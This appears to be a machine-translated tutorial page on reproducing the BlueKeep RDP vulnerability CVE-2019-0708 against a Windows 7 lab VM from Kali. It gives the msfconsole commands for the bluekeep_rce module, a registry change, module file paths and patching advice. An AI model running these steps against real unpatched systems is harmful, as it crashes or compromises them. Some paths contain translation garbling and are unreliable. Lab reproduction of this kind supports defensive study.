Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

How to analyze RDP ultimate EXP blasting loophole CVE-2019-0708

2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)05/31 Report--

This article shows you how to analyze RDP's ultimate EXP blast vulnerability CVE-2019-0708, which is concise and easy to understand. It will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

Overview of 0x00 vulnerabilities

CVE-2019-0708 is a serious RDP remote code execution vulnerability released by Microsoft on May 14, 2019. This vulnerability does not require authentication and user interaction and can lead to a worm outbreak with an impact comparable to that of wannycry.

September 07, 2019, @ rapid7 publicly released the CVE-2019-0708 exploitation module in its metasploit-framework repository. Vulnerability exploitation tools have begun to spread and become a worm-level attack threat.

0x01 affects version

Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows 2003

Windows XP

Users of Windows 8 and Windows 10 and later are not affected by this vulnerability

Principle of 0x02 vulnerability

The UAF vulnerability is caused by the re-use of the object pointer after it is released, as detailed in

Https://www.anquanke.com/post/id/181577

0x03 environment building

Environmental preparation:

Win7 sp1-192.168.152.139

Kali 2019.4-192.168.152.138

1.win7 sp1 prepares:

Open 3389:

Open the control panel, select system and Security, select system, click remote Settings, pop up system Properties, click remote, and select a computer connection on the remote Desktop that allows any version of the remote Desktop to run (less secure).

2.Win+r, enter the cmd command, enter netstat-ano to view the port status, you can see that the 3389 status is listening.

3. Modify the registry:

Win + R enter regedit into Registry Editor, click the following directory to find fDisableCam and change the value to 0

HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Control

\ TerminalServer\ Winstations\ RDP-Tcp\ fDisableCam = 0

4. Open kali:

Kali2019 version of the files you need to download

You can see files with four .rb suffixes, and then put them in the appropriate directory (the rdp directory needs to be created by yourself)

Rdp.rb / usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rd

Rdp_scanner.rb / usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

Cve_2019_0708_bluekeep.rb / usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

Cve_2019_0708_bluekeep_rce.rb / usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

5. Check to see if the file was copied successfully

Cd / usr/share/metasploit-framework/lib/msf/core/exploit/

Cd / usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

Cd / usr/share/metasploit-framework/modules/exploit/windows/rdp/

Recurrence of 0x04 vulnerabilities

1. Start msf:

Msfconsole

two。 Reload all modules (important):

Command: reload_all

3. Search vulnerability module

Search 2019_0708

Use exploit/windows/rdp/cve_2019_0708_bluekeep_rce / / use attack module

Set rhosts 192.168.152.139 / / set target host (win7 sp1)

Set rport 3389 / / set target port

Set target 3

4.Run executes win7 sp1 blue screen

0x05 vulnerability repair

1. Make the security patch of the corresponding system in time

two。 Close port 3389 or add a firewall security policy to restrict access to port 3389

3. If you can't patch it, you can turn on remote Desktop (Network level Authentication (NLA)) to temporarily prevent vulnerabilities.

The above content is how to analyze RDP's ultimate EXP blast vulnerability CVE-2019-0708. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report